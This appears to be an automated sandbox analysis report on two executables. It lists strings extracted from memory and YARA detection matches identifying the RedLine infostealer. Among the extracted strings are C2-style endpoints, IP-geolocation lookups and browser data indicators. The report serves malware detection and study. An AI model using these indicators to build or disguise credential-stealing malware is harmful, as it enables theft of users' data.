                    Source: CiENBY.exe, 00000012.00000002.2081500546.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002890000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                    Source: PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: PZNfhfaj9O.exe, CiENBY.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: PZNfhfaj9O.exeStatic PE information: invalid certificate
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1865981717.0000000002D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1862161622.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1870347095.00000000078F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003025000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exeBinary or memory string: OriginalFilenameDQOrL.exe< vs PZNfhfaj9O.exe
                    Source: PZNfhfaj9O.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
